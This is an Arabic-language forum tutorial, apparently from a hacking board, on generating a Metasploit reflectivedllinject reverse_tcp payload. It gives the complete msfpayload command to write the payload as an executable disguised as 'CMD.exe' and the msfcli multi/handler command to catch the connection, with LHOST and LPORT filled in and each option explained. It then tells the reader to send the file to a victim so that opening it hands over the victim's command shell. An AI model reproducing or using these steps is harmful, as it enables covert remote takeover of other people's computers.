بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
ادري طولت عليكم لكن لا تآخذوني ظروف ومشاغل
الله بعين
اليوم رجعت لكم وبدرس عن صناعة بايلود reflectivedllinject وتستخدم في دوس الضحية وللعلم للي يعرف بأوامر الدوس رح يبدع فيه ومن اوامرها نقل او تحميل ملف من النت وتشغيله او نقله مش متذكر تمام لكن يساعدك كثير
للعلم هي لا تختلف عن ساتبقتها وانما شبيهة بها تمام مجرد تغيير اسم البايلود
نبدأ بفتح دوس الميتا سبلويت من الوندوز ابدأ \\ البرامج \\ metasploit 3 \\ CMD shell
نضع الأمر هذا كود PHP:
ruby msfpayload windows/reflectivedllinject/reverse_tcp LHOST=192.168.1.2 LPORT=9999 X >"C:\"CMD.exe
الآن رح ينصنع بايلود ورح يكون في المسار C بجهازك بأسم ملف تنفيذي CMD.exe
الآن نيجي للأمر التالي وهو التصنت
بالامر
كود PHP:
ruby msfcli multi/handler PAYLOAD=windows/reflectivedllinject/reverse_tcp LHOST=192.168.1.2 LPORT=9999 E
الاوامر كلها مرت معك بالدرس السابق لكن نشرحها ع السريع
msfcli لأستخدام ثغرة مباشرة
multi/handler ثغرة التصنت
PAYLOAD اسم البايلود المستخدم
LHOST اي بي جهازك
LPORT بورت مفتوح بجهازك لأستخدامه للتصنت
E للأستغلال اختصار ل Exploit
الآن ترسل الملف بأي طريقة وبعد ارساله وفتحه من قبل الضحية رح يتفتح لك دوس الضحية
واي شيء غير مفهوم ارجوا مراجعتي
#####
تحياتي
لا للاحتكار
المجهوول
Fhg]vs hgshfuD wkhum fhdg,] hgJ reflectivedllinject